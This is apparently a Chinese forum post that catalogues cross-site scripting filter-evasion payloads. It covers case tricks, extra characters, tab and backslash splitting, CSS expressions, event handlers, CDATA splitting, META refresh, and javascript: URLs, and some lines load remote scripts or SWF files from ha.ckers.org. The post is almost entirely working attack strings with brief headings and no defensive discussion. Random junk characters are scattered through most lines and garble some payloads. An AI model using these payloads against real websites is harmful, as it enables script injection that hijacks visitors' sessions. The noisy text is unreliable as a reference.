1. 改变字符大小写
8 s% N$ U! s5 U
$ ?$ U; n5 @$ H. P' }' j! A
/ p( S4 l) i. p0 l, Q F4 H' `- i
: c8 Q% W F/ V& [: ^4 ^. _ <sCript>alert(‘d’)</scRipT>) O. h( y9 l c: E" q% P& H3 `
" l' x7 S8 c2 f z3 c3 E S$ a! w* X
2. 利用多加一些其它字符来规避Regular Expression的检查' R4 B, q v. u0 W" z5 k. B
6 l4 Y+ F& E6 ^2 o: Y( ^
<<script>alert(‘c’)//<</script>
# O' B' |( O6 o3 }1 n5 g# D3 @% ]
0 h: K0 e' q: U+ i% B( }4 u$ x <SCRIPT a=">" SRC="t.js"></SCRIPT>; W8 x5 v& B! e
5 m( j. g0 V- h <SCRIPT =">" SRC="t.js"></SCRIPT>- A+ o4 o3 R: x4 m
2 g/ a/ `9 ]) {; \) T
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
/ a' w2 w/ F. V8 [% E" O$ m+ y# ?
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>9 _2 y: M& k& P6 v1 F
, X) t# y$ P( {. [3 I2 C
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
# o3 L+ S" X& }* R; @
+ N0 D) e) K7 g& d: y7 C <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
3 @, e' Y* x) @4 I
( E: f# p3 C6 I1 r: R3. 以其它扩展名取代.js6 H! O+ p, y3 b- w2 R* A
- U! _6 R5 }8 o3 T3 y
<script src="bad.jpg"></script>' F) B2 Q& G' I7 B
" b- k( u5 C, M- @! H- M0 H! H
4. 将Javascript写在CSS档里) Q/ y1 l0 T. s/ E: J& [
6 r, g9 K3 C- N- ~. m
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">2 y% \2 }- t, m
% r4 B# w+ e Q! D) W# \ example:. ?0 Q6 s2 N$ ]9 `6 x# f& S( y
. ]- X: H/ q' k. l7 q. ^ body {
) L( f2 C& L# y% Y8 T) X: r$ S/ Q' z! B+ d$ l1 R) Z- ?4 V9 @! A
background-image: url(‘javascript:alert("XSS");’)# f0 q6 o, E) P
; ?# N; D7 l( V6 Z; V5 i( a1 p
}
* L4 T/ e% \. K% V- }$ B0 t; p5 E2 q" Y& s9 |
5. 在script的tag里加入一些其它字符
( t! W3 |: R H
3 V2 H5 P& k+ {# v+ Z% w <SCRIPT/SRC="t.js"></SCRIPT>
% n" _" T y( l+ T; ~. v9 `/ h# C+ t! z4 ~$ a! {! B( [
<SCRIPT/anyword SRC="t.js"></SCRIPT>
. i) t' R G/ q/ s; q7 \! O0 v H2 _* } s
6. 使用tab或是new line来规避
8 [ a x n, ~# U$ a' I& ^
5 M: A: l# W! ~ <img src="jav ascr ipt:alert(‘XSS3′)">
7 o) z+ f) S$ n+ s) M. v, U
8 V) k: D. b' Y7 G1 I& }2 c <img src="jav ascr ipt:alert(‘XSS3′)">
' R) s4 {, x# q. i5 y( M( b: T: K# I' {# B
<IMG SRC="jav ascript:alert(‘XSS’);">
9 G1 b+ I: z9 x# d* F( Z, P' p P) m+ r) z
-> tag
. ~) m: Z/ Q/ V, `1 f$ |1 X) G
, q4 G9 W, R; ]+ L( B) }4 o; _( L -> new line
u- p3 b; U$ J- |7 r/ ]: R# \: U7 Y
7. 使用"\"来规避
' G, I; A" R3 b/ K! J6 F4 H a0 B4 U& W
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE> q- u6 r* f( j o, Q3 n, ?
) m# k j g& H3 j& } <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>6 `+ D* j/ j1 p" U
( Q* W2 @* g8 \! p6 P
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))"> `3 ~4 L: }% u
: J3 a- y& O2 k) T1 |; k# Y <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">) ?1 n9 E3 c6 E6 N; p
4 @: p3 V! w! P' n: }- [- A
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
* o8 p% _8 g$ x: w/ d
& W; w; b, i. d; _' R8. 使用Hex encode来规避(也可能会把";"拿掉)3 x$ o. ? [6 p% a# V7 \
" l+ T! ]' P2 |$ n
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">& I: Y, q5 v6 M7 X: P9 G: E
3 ~/ {$ C; s6 B) E/ T/ A* B 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">" `, g; r8 ~' I$ T/ B
8 P6 p0 A* E: }6 b! q
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">' @: v$ ~7 t( D1 `- o
" Z8 p4 e: m% N( l, B/ h6 B; `2 m 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
& a$ j" [2 \# s/ m7 P6 B4 a5 ]% o
- Y! z' J, t+ A7 x2 p& |) T: k9. script in HTML tag8 T% H; C6 m+ ~: E- J: f6 r" t
4 ~/ R. f/ @. D. z7 Y4 ~
<body onload=」alert(‘onload’)」>
1 E. e8 v4 M, G; h7 \$ q+ P9 _ [$ E1 g2 J8 A3 ? f d6 V# Y' F
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload G) a f6 Z' O* l
2 ]/ |1 k3 R0 l+ |5 H$ @( w10. 在swf里含有xss的code3 P: ~; P9 ?, b i, U% N' S% b
3 T3 ^# L7 W- s <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>, |/ F, o2 t$ e& X# F: ?( e9 [
9 b4 O+ z5 ~- U+ E: \11. 利用CDATA将xss的code拆开,再组合起来。& h. |% t. |0 G3 t% L4 D" A
; u- d I( a" [4 G: k
<XML ID=I><X><C>' ?: i: i/ {/ [' s u
' Q/ W6 @% K* d! S <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
" I1 }0 E! A& [9 a7 `3 U e
& ^0 K( z4 j @4 ^7 a9 M </C></X>6 n) m3 Y9 m1 U4 |. @! P/ n; C
5 [% ~9 N6 T6 T; j/ V3 z1 Q
</xml>
. W. ^/ |/ X) K5 a+ d' A( u N/ T
; Q' @( [' d# H3 o L <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>+ r6 g: H! A/ l$ ~1 x. _1 ~: C
3 ?6 G6 Q$ ]' x) Z/ W! n W
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>+ C f s" W" z s$ J9 s
$ N( M: w7 x* {- A. K
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
$ M1 ]* h) M* w- N# L
- e* F* l! n" D" w9 g6 H12. 利用HTML+TIME。
1 T1 @5 n' }& b& c
. C+ g+ ?7 @* ]/ u- |5 C0 \8 k2 r! _: H1 C <HTML><BODY>, c9 |+ s) k9 x+ W0 H2 |- [
1 R% e% P- w; Y2 n4 H8 I% o
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">; L* p$ N* f% M! H; m' q
$ L9 L* X( z' U0 \) \% B <?import namespace="t" implementation="#default#time2">& b2 {8 B% I V$ |& C( F
' Q; I Y' {! T5 v) }4 E B: @ <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">; G6 }1 A% ^# @
* |; g6 D+ _- j J. ? </BODY></HTML>3 `3 J& H$ m1 R
; N) R6 V, }9 {4 `13. 透过META写入Cookie。
9 a5 N6 ^5 j( l3 I* L( F K# J9 m
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">9 o! u% z3 r$ E# m
4 k' `( ]0 L# J& u, Y
14. javascript in src , href , url
G0 x& F% p& N* F0 x. v, ?9 G: N7 J1 e1 S, R0 c* A. D
<IFRAME SRC=javascript:alert(’13′)></IFRAME>& U, u+ _, `: B$ a$ g+ ?, k
2 R$ ~/ J: y) C% g" @* e! \
<img src="javascript:alert(‘XSS3′)">
0 M3 O0 A( K6 _, ?7 X7 T0 G/ G5 ]1 {: o) ]* w: |. i& b5 n! f `
<IMG DYNSRC="javascript:alert(‘XSS20′)">
9 w$ x9 y( K$ l$ ?' E2 @/ c% f H% D( `; ]2 m m
<IMG LOWSRC="javascript:alert(‘XSS21′)">
! O, I7 o0 W" @* n
5 g6 o) S) L# j; t <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">) X6 i% h Z. v
5 o7 p/ _: |* o
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>5 t1 }# L) n) y- l- _
! ~7 l% X2 R+ z% j! G) O3 G6 d
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
+ |, c1 Z5 r. R/ p. ~
( A) [% `9 k! ^- t <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">; u3 Q0 j2 d4 m( s+ k
0 P0 O: M/ R3 P" M
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
7 N4 B4 a3 r; `: [9 t7 ]; w, L9 B' p2 Y9 {6 g
</STYLE><A CLASS=XSS></A>; g. n) A: G$ ]' T! Q0 A
( }, O' e: w9 P/ }4 u/ T( E <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
8 v$ t" t" n/ P1 W& G( M$ v2 i
. r0 q3 i _; {- o, h5 p |
发表于 2012-12-31 09:59:28
收藏
支持
反对